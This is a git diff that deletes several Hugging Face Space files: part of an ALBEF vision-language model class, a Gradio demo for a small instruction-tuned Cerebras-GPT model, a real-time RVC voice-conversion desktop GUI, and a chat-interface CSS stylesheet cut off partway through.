sim_t2i=sim_t2i, - sim_i2t_m=sim_i2t_m, - sim_t2i_m=sim_t2i_m, - sim_i2t_targets=sim_i2t_targets, - sim_t2i_targets=sim_t2i_targets, - ), - intermediate_output=AlbefIntermediateOutput( - image_embeds=image_embeds, - image_embeds_m=image_embeds_m, - text_embeds=text_embeds, - text_embeds_m=text_embeds_m, - encoder_output=encoder_output_pos, - encoder_output_neg=encoder_output_neg, - itm_logits=itm_logits, - itm_labels=itm_labels, - ), - ) - - def mask( - self, - input_ids, - vocab_size, - device, - targets=None, - masked_indices=None, - probability_matrix=None, - ): - """ - Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original. - """ - if masked_indices is None: - masked_indices = torch.bernoulli(probability_matrix).bool() - - masked_indices[input_ids == self.tokenizer.pad_token_id] = False - masked_indices[input_ids == self.tokenizer.cls_token_id] = False - - if targets is not None: - targets[~masked_indices] = -100 # We only compute loss on masked tokens - - # 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK]) - indices_replaced = ( - torch.bernoulli(torch.full(input_ids.shape, 0.8)).bool() & masked_indices - ) - input_ids[indices_replaced] = self.tokenizer.mask_token_id - - # 10% of the time, we replace masked input tokens with random word - indices_random = ( - torch.bernoulli(torch.full(input_ids.shape, 0.5)).bool() - & masked_indices - & ~indices_replaced - ) - random_words = torch.randint(vocab_size, input_ids.shape, dtype=torch.long).to( - device - ) - input_ids[indices_random] = random_words[indices_random] - # The rest of the time (10% of the time) we keep the masked input tokens unchanged - - if targets is not None: - return input_ids, targets - else: - return input_ids - - @classmethod - def from_config(cls, cfg=None): - image_encoder = VisionTransformerEncoder.from_config(cfg, from_pretrained=True) - config_text_encoder = BertConfig.from_json_file( - get_abs_path(cfg["med_config_path"]) - ) - config_text_encoder.fusion_layer = 6 - text_encoder = BertForMaskedLM.from_pretrained( - "bert-base-uncased", config=config_text_encoder - ) - - embed_dim = cfg.get("embed_dim", 256) - momentum = cfg.get("momentum", 0.995) - alpha = cfg.get("alpha", 0.4) - mlm_mask_prob = cfg.get("mlm_mask_prob", 0.15) - temp = cfg.get("temp", 0.07) - max_txt_len = cfg.get("max_txt_len", 30) - queue_size = cfg.get("queue_size", 65536) - - model = cls( - image_encoder=image_encoder, - text_encoder=text_encoder, - queue_size=queue_size, - embed_dim=embed_dim, - mlm_mask_prob=mlm_mask_prob, - temp=temp, - momentum=momentum, - alpha=alpha, - max_txt_len=max_txt_len, - ) - - return model diff --git a/spaces/SebastianSchramm/Cerebras-GPT-111M-instruction-playground/app.py b/spaces/SebastianSchramm/Cerebras-GPT-111M-instruction-playground/app.py deleted file mode 100644 index fb3e5d9f5afcab04c954568afb535fa92a855076..0000000000000000000000000000000000000000 --- a/spaces/SebastianSchramm/Cerebras-GPT-111M-instruction-playground/app.py +++ /dev/null @@ -1,155 +0,0 @@ -import os -import gradio as gr -from transformers import AutoModelForCausalLM, AutoTokenizer, GenerationConfig, TextIteratorStreamer -import torch -from threading import Thread -from huggingface_hub import Repository -import json - -theme = gr.themes.Monochrome( - primary_hue="indigo", - secondary_hue="blue", - neutral_hue="slate", - radius_size=gr.themes.sizes.radius_sm, - font=[gr.themes.GoogleFont("Open Sans"), "ui-sans-serif", "system-ui", "sans-serif"], -) -os.environ["TOKENIZERS_PARALLELISM"] = "false" - -# Load peft config for pre-trained checkpoint etc. -device = "cuda" if torch.cuda.is_available() else "cpu" -model_id = "SebastianSchramm/Cerebras-GPT-111M-instruction" -if device == "cpu": - model = AutoModelForCausalLM.from_pretrained(model_id) -else: - model = AutoModelForCausalLM.from_pretrained(model_id, device_map="auto") -tokenizer = AutoTokenizer.from_pretrained(model_id) - -prompt_template = "Below is an instruction that describes a task, paired with an input that provides further context.\n" \ - "Write a response that appropriately completes the request.\n\n" \ - "### Instruction:\n{instruction}\n\n### Input:\n{input}\n\n### Response:" - - -def generate(instruction, input='', temperature=1.0, max_new_tokens=256, top_p=0.9, length_penalty=1.0): - formatted_instruction = prompt_template.format(instruction=instruction, input=input) - - # make sure temperature top_p and length_penalty are floats - temperature = float(temperature) - top_p = float(top_p) - length_penalty = float(length_penalty) - - # STREAMING BASED ON git+https://github.com/gante/transformers.git@streamer_iterator - - # streaming - streamer = TextIteratorStreamer(tokenizer) - model_inputs = tokenizer(formatted_instruction, return_tensors="pt", truncation=True, max_length=2048) - # move to gpu - model_inputs = {k: v.to(device) for k, v in model_inputs.items()} - - generate_kwargs = dict( - top_p=top_p, - top_k=0, - temperature=temperature, - do_sample=True, - max_new_tokens=max_new_tokens, - early_stopping=True, - length_penalty=length_penalty, - eos_token_id=tokenizer.eos_token_id, - pad_token_id=tokenizer.eos_token_id, - ) - t = Thread(target=model.generate, kwargs={**dict(model_inputs, streamer=streamer), **generate_kwargs}) - t.start() - - output = "" - hidden_output = "" - for new_text in streamer: - # skip streaming until new text is available - if len(hidden_output) <= len(formatted_instruction): - hidden_output += new_text - continue - # replace eos token - if tokenizer.eos_token in new_text: - new_text = new_text.replace(tokenizer.eos_token, "") - output += new_text - yield output - return output - -examples = [] - -def process_example(args): - for x in generate(args): - pass - return x - -with gr.Blocks(theme=theme) as demo: - with gr.Column(): - gr.Markdown( - """

    Instruction-tuned Cerebras GPT 111M Language Model for Text

    -

    - Link to model: [Cerebras-GPT-111M-instruction](SebastianSchramm/Cerebras-GPT-111M-instruction) -

    - """ - ) - with gr.Row(): - with gr.Column(scale=3): - instruction = gr.Textbox(placeholder="Instruction...", label="Instruction") - input = gr.Textbox(placeholder="Input...", label="Input") - output = gr.Textbox( - interactive=False, - lines=8, - label="Response", - placeholder="Response will be shown here...", - ) - submit = gr.Button("Generate", variant="primary") - gr.Examples( - examples=examples, - inputs=[instruction, input], - cache_examples=True, - fn=process_example, - outputs=[output], - ) - - with gr.Column(scale=1): - temperature = gr.Slider( - label="Temperature", - value=1.0, - minimum=0.01, - maximum=1.0, - step=0.1, - interactive=True, - info="The higher more random", - ) - max_new_tokens = gr.Slider( - label="Max new tokens", - value=256, - minimum=0, - maximum=2048, - step=5, - interactive=True, - info="The maximum numbers of new tokens", - ) - top_p = gr.Slider( - label="Top p", - value=0.9, - minimum=0.01, - maximum=1, - step=0.05, - interactive=True, - info="probabilities that add up are kept", - ) - length_penalty = gr.Slider( - label="Length penalty", - value=1.0, - minimum=-10.0, - maximum=10.0, - step=0.1, - interactive=True, - info="> 0.0 longer, < 0.0 shorter", - ) - - submit.click(generate, inputs=[instruction, input, temperature, max_new_tokens, top_p, length_penalty], outputs=[output]) - instruction.submit( - generate, inputs=[instruction, input, temperature, max_new_tokens, top_p, length_penalty], outputs=[output] - ) - -demo.queue(concurrency_count=1) -demo.launch(enable_queue=True) diff --git a/spaces/ServerX/PorcoDiaz/gui_v0.py b/spaces/ServerX/PorcoDiaz/gui_v0.py deleted file mode 100644 index 88c3cf9eb1eaa0fa812b32ae4d3750b4ce0a8699..0000000000000000000000000000000000000000 --- a/spaces/ServerX/PorcoDiaz/gui_v0.py +++ /dev/null @@ -1,786 +0,0 @@ -import os, sys, traceback, re - -import json - -now_dir = os.getcwd() -sys.path.append(now_dir) -from configs.config import Config - -Config = Config() -import PySimpleGUI as sg -import sounddevice as sd -import noisereduce as nr -import numpy as np -from fairseq import checkpoint_utils -import librosa, torch, pyworld, faiss, time, threading -import torch.nn.functional as F -import torchaudio.transforms as tat -import scipy.signal as signal -import torchcrepe - -# import matplotlib.pyplot as plt -from lib.infer_pack.models import ( - SynthesizerTrnMs256NSFsid, - SynthesizerTrnMs256NSFsid_nono, - SynthesizerTrnMs768NSFsid, - SynthesizerTrnMs768NSFsid_nono, -) -from i18n import I18nAuto - -i18n = I18nAuto() -device = torch.device("cuda" if torch.cuda.is_available() else "cpu") -current_dir = os.getcwd() - - -class RVC: - def __init__( - self, key, f0_method, hubert_path, pth_path, index_path, npy_path, index_rate - ) -> None: - """ - 初始化 - """ - try: - self.f0_up_key = key - self.time_step = 160 / 16000 * 1000 - self.f0_min = 50 - self.f0_max = 1100 - self.f0_mel_min = 1127 * np.log(1 + self.f0_min / 700) - self.f0_mel_max = 1127 * np.log(1 + self.f0_max / 700) - self.f0_method = f0_method - self.sr = 16000 - self.window = 160 - - # Get Torch Device - if torch.cuda.is_available(): - self.torch_device = torch.device( - f"cuda:{0 % torch.cuda.device_count()}" - ) - elif torch.backends.mps.is_available(): - self.torch_device = torch.device("mps") - else: - self.torch_device = torch.device("cpu") - - if index_rate != 0: - self.index = faiss.read_index(index_path) - # self.big_npy = np.load(npy_path) - self.big_npy = self.index.reconstruct_n(0, self.index.ntotal) - print("index search enabled") - self.index_rate = index_rate - model_path = hubert_path - print("load model(s) from {}".format(model_path)) - models, saved_cfg, task = checkpoint_utils.load_model_ensemble_and_task( - [model_path], - suffix="", - ) - self.model = models[0] - self.model = self.model.to(device) - if Config.is_half: - self.model = self.model.half() - else: - self.model = self.model.float() - self.model.eval() - cpt = torch.load(pth_path, map_location="cpu") - self.tgt_sr = cpt["config"][-1] - cpt["config"][-3] = cpt["weight"]["emb_g.weight"].shape[0] # n_spk - self.if_f0 = cpt.get("f0", 1) - self.version = cpt.get("version", "v1") - if self.version == "v1": - if self.if_f0 == 1: - self.net_g = SynthesizerTrnMs256NSFsid( - *cpt["config"], is_half=Config.is_half - ) - else: - self.net_g = SynthesizerTrnMs256NSFsid_nono(*cpt["config"]) - elif self.version == "v2": - if self.if_f0 == 1: - self.net_g = SynthesizerTrnMs768NSFsid( - *cpt["config"], is_half=Config.is_half - ) - else: - self.net_g = SynthesizerTrnMs768NSFsid_nono(*cpt["config"]) - del self.net_g.enc_q - print(self.net_g.load_state_dict(cpt["weight"], strict=False)) - self.net_g.eval().to(device) - if Config.is_half: - self.net_g = self.net_g.half() - else: - self.net_g = self.net_g.float() - except: - print(traceback.format_exc()) - - def get_regular_crepe_computation(self, x, f0_min, f0_max, model="full"): - batch_size = 512 - # Compute pitch using first gpu - audio = torch.tensor(np.copy(x))[None].float() - f0, pd = torchcrepe.predict( - audio, - self.sr, - self.window, - f0_min, - f0_max, - model, - batch_size=batch_size, - device=self.torch_device, - return_periodicity=True, - ) - pd = torchcrepe.filter.median(pd, 3) - f0 = torchcrepe.filter.mean(f0, 3) - f0[pd < 0.1] = 0 - f0 = f0[0].cpu().numpy() - return f0 - - def get_harvest_computation(self, x, f0_min, f0_max): - f0, t = pyworld.harvest( - x.astype(np.double), - fs=self.sr, - f0_ceil=f0_max, - f0_floor=f0_min, - frame_period=10, - ) - f0 = pyworld.stonemask(x.astype(np.double), f0, t, self.sr) - f0 = signal.medfilt(f0, 3) - return f0 - - def get_f0(self, x, f0_up_key, inp_f0=None): - # Calculate Padding and f0 details here - p_len = x.shape[0] // 512 # For Now This probs doesn't work - x_pad = 1 - f0_min = 50 - f0_max = 1100 - f0_mel_min = 1127 * np.log(1 + f0_min / 700) - f0_mel_max = 1127 * np.log(1 + f0_max / 700) - - f0 = 0 - # Here, check f0_methods and get their computations - if self.f0_method == "harvest": - f0 = self.get_harvest_computation(x, f0_min, f0_max) - elif self.f0_method == "reg-crepe": - f0 = self.get_regular_crepe_computation(x, f0_min, f0_max) - elif self.f0_method == "reg-crepe-tiny": - f0 = self.get_regular_crepe_computation(x, f0_min, f0_max, "tiny") - - # Calculate f0_course and f0_bak here - f0 *= pow(2, f0_up_key / 12) - # with open("test.txt","w")as f:f.write("\n".join([str(i)for i in f0.tolist()])) - tf0 = self.sr // self.window # 每秒f0点数 - if inp_f0 is not None: - delta_t = np.round( - (inp_f0[:, 0].max() - inp_f0[:, 0].min()) * tf0 + 1 - ).astype("int16") - replace_f0 = np.interp( - list(range(delta_t)), inp_f0[:, 0] * 100, inp_f0[:, 1] - ) - shape = f0[x_pad * tf0 : x_pad * tf0 + len(replace_f0)].shape[0] - f0[x_pad * tf0 : x_pad * tf0 + len(replace_f0)] = replace_f0[:shape] - # with open("test_opt.txt","w")as f:f.write("\n".join([str(i)for i in f0.tolist()])) - f0bak = f0.copy() - f0_mel = 1127 * np.log(1 + f0 / 700) - f0_mel[f0_mel > 0] = (f0_mel[f0_mel > 0] - f0_mel_min) * 254 / ( - f0_mel_max - f0_mel_min - ) + 1 - f0_mel[f0_mel <= 1] = 1 - f0_mel[f0_mel > 255] = 255 - f0_coarse = np.rint(f0_mel).astype(np.int) - return f0_coarse, f0bak # 1-0 - - def infer(self, feats: torch.Tensor) -> np.ndarray: - """ - 推理函数 - """ - audio = feats.clone().cpu().numpy() - assert feats.dim() == 1, feats.dim() - feats = feats.view(1, -1) - padding_mask = torch.BoolTensor(feats.shape).fill_(False) - if Config.is_half: - feats = feats.half() - else: - feats = feats.float() - inputs = { - "source": feats.to(device), - "padding_mask": padding_mask.to(device), - "output_layer": 9 if self.version == "v1" else 12, - } - torch.cuda.synchronize() - with torch.no_grad(): - logits = self.model.extract_features(**inputs) - feats = ( - self.model.final_proj(logits[0]) if self.version == "v1" else logits[0] - ) - - ####索引优化 - try: - if ( - hasattr(self, "index") - and hasattr(self, "big_npy") - and self.index_rate != 0 - ): - npy = feats[0].cpu().numpy().astype("float32") - score, ix = self.index.search(npy, k=8) - weight = np.square(1 / score) - weight /= weight.sum(axis=1, keepdims=True) - npy = np.sum(self.big_npy[ix] * np.expand_dims(weight, axis=2), axis=1) - if Config.is_half: - npy = npy.astype("float16") - feats = ( - torch.from_numpy(npy).unsqueeze(0).to(device) * self.index_rate - + (1 - self.index_rate) * feats - ) - else: - print("index search FAIL or disabled") - except: - traceback.print_exc() - print("index search FAIL") - feats = F.interpolate(feats.permute(0, 2, 1), scale_factor=2).permute(0, 2, 1) - torch.cuda.synchronize() - print(feats.shape) - if self.if_f0 == 1: - pitch, pitchf = self.get_f0(audio, self.f0_up_key) - p_len = min(feats.shape[1], 13000, pitch.shape[0]) # 太大了爆显存 - else: - pitch, pitchf = None, None - p_len = min(feats.shape[1], 13000) # 太大了爆显存 - torch.cuda.synchronize() - # print(feats.shape,pitch.shape) - feats = feats[:, :p_len, :] - if self.if_f0 == 1: - pitch = pitch[:p_len] - pitchf = pitchf[:p_len] - pitch = torch.LongTensor(pitch).unsqueeze(0).to(device) - pitchf = torch.FloatTensor(pitchf).unsqueeze(0).to(device) - p_len = torch.LongTensor([p_len]).to(device) - ii = 0 # sid - sid = torch.LongTensor([ii]).to(device) - with torch.no_grad(): - if self.if_f0 == 1: - infered_audio = ( - self.net_g.infer(feats, p_len, pitch, pitchf, sid)[0][0, 0] - .data.cpu() - .float() - ) - else: - infered_audio = ( - self.net_g.infer(feats, p_len, sid)[0][0, 0].data.cpu().float() - ) - torch.cuda.synchronize() - return infered_audio - - -class GUIConfig: - def __init__(self) -> None: - self.hubert_path: str = "" - self.pth_path: str = "" - self.index_path: str = "" - self.npy_path: str = "" - self.f0_method: str = "" - self.pitch: int = 12 - self.samplerate: int = 44100 - self.block_time: float = 1.0 # s - self.buffer_num: int = 1 - self.threhold: int = -30 - self.crossfade_time: float = 0.08 - self.extra_time: float = 0.04 - self.I_noise_reduce = False - self.O_noise_reduce = False - self.index_rate = 0.3 - - -class GUI: - def __init__(self) -> None: - self.config = GUIConfig() - self.flag_vc = False - - self.launcher() - - def load(self): - ( - input_devices, - output_devices, - input_devices_indices, - output_devices_indices, - ) = self.get_devices() - try: - with open("values1.json", "r") as j: - data = json.load(j) - except: - # Injecting f0_method into the json data - with open("values1.json", "w") as j: - data = { - "pth_path": "", - "index_path": "", - "sg_input_device": input_devices[ - input_devices_indices.index(sd.default.device[0]) - ], - "sg_output_device": output_devices[ - output_devices_indices.index(sd.default.device[1]) - ], - "threhold": "-45", - "pitch": "0", - "index_rate": "0", - "block_time": "1", - "crossfade_length": "0.04", - "extra_time": "1", - } - return data - - def launcher(self): - data = self.load() - sg.theme("DarkTeal12") - input_devices, output_devices, _, _ = self.get_devices() - layout = [ - [ - sg.Frame( - title="Proudly forked by Mangio621", - ), - sg.Frame( - title=i18n("Load model"), - layout=[ - [ - sg.Input( - default_text="hubert_base.pt", - key="hubert_path", - disabled=True, - ), - sg.FileBrowse( - i18n("Hubert Model"), - initial_folder=os.path.join(os.getcwd()), - file_types=(("pt files", "*.pt"),), - ), - ], - [ - sg.Input( - default_text=data.get("pth_path", ""), - key="pth_path", - ), - sg.FileBrowse( - i18n("Select the .pth file"), - initial_folder=os.path.join(os.getcwd(), "weights"), - file_types=(("weight files", "*.pth"),), - ), - ], - [ - sg.Input( - default_text=data.get("index_path", ""), - key="index_path", - ), - sg.FileBrowse( - i18n("Select the .index file"), - initial_folder=os.path.join(os.getcwd(), "logs"), - file_types=(("index files", "*.index"),), - ), - ], - [ - sg.Input( - default_text="你不需要填写这个You don't need write this.", - key="npy_path", - disabled=True, - ), - sg.FileBrowse( - i18n("Select the .npy file"), - initial_folder=os.path.join(os.getcwd(), "logs"), - file_types=(("feature files", "*.npy"),), - ), - ], - ], - ), - ], - [ - # Mangio f0 Selection frame Here - sg.Frame( - layout=[ - [ - sg.Radio( - "Harvest", "f0_method", key="harvest", default=True - ), - sg.Radio("Crepe", "f0_method", key="reg-crepe"), - sg.Radio("Crepe Tiny", "f0_method", key="reg-crepe-tiny"), - ] - ], - title="Select an f0 Method", - ) - ], - [ - sg.Frame( - layout=[ - [ - sg.Text(i18n("Input device")), - sg.Combo( - input_devices, - key="sg_input_device", - default_value=data.get("sg_input_device", ""), - ), - ], - [ - sg.Text(i18n("Output device")), - sg.Combo( - output_devices, - key="sg_output_device", - default_value=data.get("sg_output_device", ""), - ), - ], - ], - title=i18n("Audio device (please use the same type of driver)"), - ) - ], - [ - sg.Frame( - layout=[ - [ - sg.Text(i18n("Response threshold")), - sg.Slider( - range=(-60, 0), - key="threhold", - resolution=1, - orientation="h", - default_value=data.get("threhold", ""), - ), - ], - [ - sg.Text(i18n("Pitch settings")), - sg.Slider( - range=(-24, 24), - key="pitch", - resolution=1, - orientation="h", - default_value=data.get("pitch", ""), - ), - ], - [ - sg.Text(i18n("Index Rate")), - sg.Slider( - range=(0.0, 1.0), - key="index_rate", - resolution=0.01, - orientation="h", - default_value=data.get("index_rate", ""), - ), - ], - ], - title=i18n("General settings"), - ), - sg.Frame( - layout=[ - [ - sg.Text(i18n("Sample length")), - sg.Slider( - range=(0.1, 3.0), - key="block_time", - resolution=0.1, - orientation="h", - default_value=data.get("block_time", ""), - ), - ], - [ - sg.Text(i18n("Fade length")), - sg.Slider( - range=(0.01, 0.15), - key="crossfade_length", - resolution=0.01, - orientation="h", - default_value=data.get("crossfade_length", ""), - ), - ], - [ - sg.Text(i18n("Extra推理时长")), - sg.Slider( - range=(0.05, 3.00), - key="extra_time", - resolution=0.01, - orientation="h", - default_value=data.get("extra_time", ""), - ), - ], - [ - sg.Checkbox(i18n("Input noise reduction"), key="I_noise_reduce"), - sg.Checkbox(i18n("Output noise reduction"), key="O_noise_reduce"), - ], - ], - title=i18n("Performance settings"), - ), - ], - [ - sg.Button(i18n("开始音频Convert"), key="start_vc"), - sg.Button(i18n("停止音频Convert"), key="stop_vc"), - sg.Text(i18n("Inference time (ms):")), - sg.Text("0", key="infer_time"), - ], - ] - self.window = sg.Window("RVC - GUI", layout=layout) - self.event_handler() - - def event_handler(self): - while True: - event, values = self.window.read() - if event == sg.WINDOW_CLOSED: - self.flag_vc = False - exit() - if event == "start_vc" and self.flag_vc == False: - if self.set_values(values) == True: - print("using_cuda:" + str(torch.cuda.is_available())) - self.start_vc() - settings = { - "pth_path": values["pth_path"], - "index_path": values["index_path"], - "f0_method": self.get_f0_method_from_radios(values), - "sg_input_device": values["sg_input_device"], - "sg_output_device": values["sg_output_device"], - "threhold": values["threhold"], - "pitch": values["pitch"], - "index_rate": values["index_rate"], - "block_time": values["block_time"], - "crossfade_length": values["crossfade_length"], - "extra_time": values["extra_time"], - } - with open("values1.json", "w") as j: - json.dump(settings, j) - if event == "stop_vc" and self.flag_vc == True: - self.flag_vc = False - - # Function that returns the used f0 method in string format "harvest" - def get_f0_method_from_radios(self, values): - f0_array = [ - {"name": "harvest", "val": values["harvest"]}, - {"name": "reg-crepe", "val": values["reg-crepe"]}, - {"name": "reg-crepe-tiny", "val": values["reg-crepe-tiny"]}, - ] - # Filter through to find a true value - used_f0 = "" - for f0 in f0_array: - if f0["val"] == True: - used_f0 = f0["name"] - break - if used_f0 == "": - used_f0 = "harvest" # Default Harvest if used_f0 is empty somehow - return used_f0 - - def set_values(self, values): - if len(values["pth_path"].strip()) == 0: - sg.popup(i18n("Select the pth file")) - return False - if len(values["index_path"].strip()) == 0: - sg.popup(i18n("Select the index file")) - return False - pattern = re.compile("[^\x00-\x7F]+") - if pattern.findall(values["hubert_path"]): - sg.popup(i18n("The hubert model path must not contain Chinese characters")) - return False - if pattern.findall(values["pth_path"]): - sg.popup(i18n("The pth file path must not contain Chinese characters.")) - return False - if pattern.findall(values["index_path"]): - sg.popup(i18n("The index file path must not contain Chinese characters.")) - return False - self.set_devices(values["sg_input_device"], values["sg_output_device"]) - self.config.hubert_path = os.path.join(current_dir, "hubert_base.pt") - self.config.pth_path = values["pth_path"] - self.config.index_path = values["index_path"] - self.config.npy_path = values["npy_path"] - self.config.f0_method = self.get_f0_method_from_radios(values) - self.config.threhold = values["threhold"] - self.config.pitch = values["pitch"] - self.config.block_time = values["block_time"] - self.config.crossfade_time = values["crossfade_length"] - self.config.extra_time = values["extra_time"] - self.config.I_noise_reduce = values["I_noise_reduce"] - self.config.O_noise_reduce = values["O_noise_reduce"] - self.config.index_rate = values["index_rate"] - return True - - def start_vc(self): - torch.cuda.empty_cache() - self.flag_vc = True - self.block_frame = int(self.config.block_time * self.config.samplerate) - self.crossfade_frame = int(self.config.crossfade_time * self.config.samplerate) - self.sola_search_frame = int(0.012 * self.config.samplerate) - self.delay_frame = int(0.01 * self.config.samplerate) # 往前预留0.02s - self.extra_frame = int(self.config.extra_time * self.config.samplerate) - self.rvc = None - self.rvc = RVC( - self.config.pitch, - self.config.f0_method, - self.config.hubert_path, - self.config.pth_path, - self.config.index_path, - self.config.npy_path, - self.config.index_rate, - ) - self.input_wav: np.ndarray = np.zeros( - self.extra_frame - + self.crossfade_frame - + self.sola_search_frame - + self.block_frame, - dtype="float32", - ) - self.output_wav: torch.Tensor = torch.zeros( - self.block_frame, device=device, dtype=torch.float32 - ) - self.sola_buffer: torch.Tensor = torch.zeros( - self.crossfade_frame, device=device, dtype=torch.float32 - ) - self.fade_in_window: torch.Tensor = torch.linspace( - 0.0, 1.0, steps=self.crossfade_frame, device=device, dtype=torch.float32 - ) - self.fade_out_window: torch.Tensor = 1 - self.fade_in_window - self.resampler1 = tat.Resample( - orig_freq=self.config.samplerate, new_freq=16000, dtype=torch.float32 - ) - self.resampler2 = tat.Resample( - orig_freq=self.rvc.tgt_sr, - new_freq=self.config.samplerate, - dtype=torch.float32, - ) - thread_vc = threading.Thread(target=self.soundinput) - thread_vc.start() - - def soundinput(self): - """ - 接受音频输入 - """ - with sd.Stream( - channels=2, - callback=self.audio_callback, - blocksize=self.block_frame, - samplerate=self.config.samplerate, - dtype="float32", - ): - while self.flag_vc: - time.sleep(self.config.block_time) - print("Audio block passed.") - print("ENDing VC") - - def audio_callback( - self, indata: np.ndarray, outdata: np.ndarray, frames, times, status - ): - """ - 音频处理 - """ - start_time = time.perf_counter() - indata = librosa.to_mono(indata.T) - if self.config.I_noise_reduce: - indata[:] = nr.reduce_noise(y=indata, sr=self.config.samplerate) - - """noise gate""" - frame_length = 2048 - hop_length = 1024 - rms = librosa.feature.rms( - y=indata, frame_length=frame_length, hop_length=hop_length - ) - db_threhold = librosa.amplitude_to_db(rms, ref=1.0)[0] < self.config.threhold - # print(rms.shape,db.shape,db) - for i in range(db_threhold.shape[0]): - if db_threhold[i]: - indata[i * hop_length : (i + 1) * hop_length] = 0 - self.input_wav[:] = np.append(self.input_wav[self.block_frame :], indata) - - # infer - print("input_wav:" + str(self.input_wav.shape)) - # print('infered_wav:'+str(infer_wav.shape)) - infer_wav: torch.Tensor = self.resampler2( - self.rvc.infer(self.resampler1(torch.from_numpy(self.input_wav))) - )[-self.crossfade_frame - self.sola_search_frame - self.block_frame :].to( - device - ) - print("infer_wav:" + str(infer_wav.shape)) - - # SOLA algorithm from https://github.com/yxlllc/DDSP-SVC - cor_nom = F.conv1d( - infer_wav[None, None, : self.crossfade_frame + self.sola_search_frame], - self.sola_buffer[None, None, :], - ) - cor_den = torch.sqrt( - F.conv1d( - infer_wav[None, None, : self.crossfade_frame + self.sola_search_frame] - ** 2, - torch.ones(1, 1, self.crossfade_frame, device=device), - ) - + 1e-8 - ) - sola_offset = torch.argmax(cor_nom[0, 0] / cor_den[0, 0]) - print("sola offset: " + str(int(sola_offset))) - - # crossfade - self.output_wav[:] = infer_wav[sola_offset : sola_offset + self.block_frame] - self.output_wav[: self.crossfade_frame] *= self.fade_in_window - self.output_wav[: self.crossfade_frame] += self.sola_buffer[:] - if sola_offset < self.sola_search_frame: - self.sola_buffer[:] = ( - infer_wav[ - -self.sola_search_frame - - self.crossfade_frame - + sola_offset : -self.sola_search_frame - + sola_offset - ] - * self.fade_out_window - ) - else: - self.sola_buffer[:] = ( - infer_wav[-self.crossfade_frame :] * self.fade_out_window - ) - - if self.config.O_noise_reduce: - outdata[:] = np.tile( - nr.reduce_noise( - y=self.output_wav[:].cpu().numpy(), sr=self.config.samplerate - ), - (2, 1), - ).T - else: - outdata[:] = self.output_wav[:].repeat(2, 1).t().cpu().numpy() - total_time = time.perf_counter() - start_time - self.window["infer_time"].update(int(total_time * 1000)) - print("infer time:" + str(total_time)) - print("f0_method: " + str(self.config.f0_method)) - - def get_devices(self, update: bool = True): - """获取设备列表""" - if update: - sd._terminate() - sd._initialize() - devices = sd.query_devices() - hostapis = sd.query_hostapis() - for hostapi in hostapis: - for device_idx in hostapi["devices"]: - devices[device_idx]["hostapi_name"] = hostapi["name"] - input_devices = [ - f"{d['name']} ({d['hostapi_name']})" - for d in devices - if d["max_input_channels"] > 0 - ] - output_devices = [ - f"{d['name']} ({d['hostapi_name']})" - for d in devices - if d["max_output_channels"] > 0 - ] - input_devices_indices = [ - d["index"] if "index" in d else d["name"] - for d in devices - if d["max_input_channels"] > 0 - ] - output_devices_indices = [ - d["index"] if "index" in d else d["name"] - for d in devices - if d["max_output_channels"] > 0 - ] - return ( - input_devices, - output_devices, - input_devices_indices, - output_devices_indices, - ) - - def set_devices(self, input_device, output_device): - """设置输出设备""" - ( - input_devices, - output_devices, - input_device_indices, - output_device_indices, - ) = self.get_devices() - sd.default.device[0] = input_device_indices[input_devices.index(input_device)] - sd.default.device[1] = output_device_indices[ - output_devices.index(output_device) - ] - print("input device:" + str(sd.default.device[0]) + ":" + str(input_device)) - print("output device:" + str(sd.default.device[1]) + ":" + str(output_device)) - - -gui = GUI() diff --git a/spaces/ShaunWithGPT/ChuanhuChatGPT/custom.css b/spaces/ShaunWithGPT/ChuanhuChatGPT/custom.css deleted file mode 100644 index abd4e9eb05d0f52c26db4ce0248475c2d8dbd1bb..0000000000000000000000000000000000000000 --- a/spaces/ShaunWithGPT/ChuanhuChatGPT/custom.css +++ /dev/null @@ -1,146 +0,0 @@ -/* status_display */ -#status_display { - display: flex; - min-height: 2.5em; - align-items: flex-end; - justify-content: flex-end; -} -#status_display p { - font-size: .85em; - font-family: monospace; - color: var(--text-color-subdued) !important; -} -/* chatbot */ -:root { - --bg-color-light: #F3F3F3; - --bg-color-dark: #121111; - } - -/* 对话气泡 */ -[class *= "message"] { - border-radius: var(--radius-xl) !important; - border: none; - padding: var(--spacing-xl) !important; - font-size: var(--text-md) !important; - line-height: var(--line-md) !important; -} -[data-testid = "bot"] { - max-width: 85%; - border-bottom-left-radius: 0 !important; -} -[data-testid = "user"] { - max-width: 85%; - width: auto !important; - border-bottom-right-radius: 0 !important; -} -/* 表格 */ -table { - margin: 1em 0; - border-collapse: collapse; - empty-cells: show; -} -td,th { - border: 1.2px solid var(--color-border-primary) !important; - padding: 0.2em; -} -thead { - background-color: rgba(175,184,193,0.2); -} -thead th { - padding: .5em .2em; -} -/* 行内代码 */ -code { - display: inline; - white-space: break-spaces; - border-radius: 6px; - margin: 0 2px 0 2px; - padding: .2em .4em .1em .4em; - background-color: rgba(175,184,193,0.2); -} -/* 代码块 */ -pre code { - display: block; - white-space: pre; - background-color: hsla(0, 0%, 0%, 80%)!important; - border-radius: 10px; - padding: 1rem 1.2rem 1rem; - margin: 1.2em 2em 1.2em 0.5em; - color: #FFF; - box-shadow: 6px 6px 16px hsla(0, 0%, 0%, 0.2); -} -/* 代码高亮样式 */ -.codehilite .hll { background-color: #49483e } -.codehilite .c { color: #75715e } /* Comment */ -.codehilite .err { color: #960050; background-color: #1e0010 } /* Error */ -.codehilite .k { color: #66d9ef } /* Keyword */ -.codehilite .l { color: #ae81ff } /* Literal */ -.codehilite .n { color: #f8f8f2 } /* Name */ -.codehilite .o { color: #f92672 } /* Operator */ -.codehilite .p { color: #f8f8f2 } /* Punctuation */ -.codehilite .ch { color: #75715e } /* Comment.Hashbang */ -.codehilite .cm { color: #75715e } /* Comment.Multiline */ -.codehilite .cp { color: #75715e } /* Comment.Preproc */ -.codehilite .cpf { color: #75715e } /* Comment.PreprocFile */ -.codehilite .c1 { color: #75715e } /* Comment.Single */ -.codehilite .cs { color: #75715e } /* Comment.Special */ -.codehilite .gd { color: #f92672 } /* Generic.Deleted */ -.codehilite .ge { font-style: italic } /* Generic.Emph */ -.codehilite .gi { color: #a6e22e } /* Generic.Inserted */ -.codehilite .gs { font-weight: bold } /* Generic.Strong */ -.codehilite .gu { color: #75715e } /* Generic.Subheading */ -.codehilite .kc { color: #66d9ef } /* Keyword.Constant */ -.codehilite .kd { color: #66d9ef } /* Keyword.Declaration */ -.codehilite .kn { color: #f92672 } 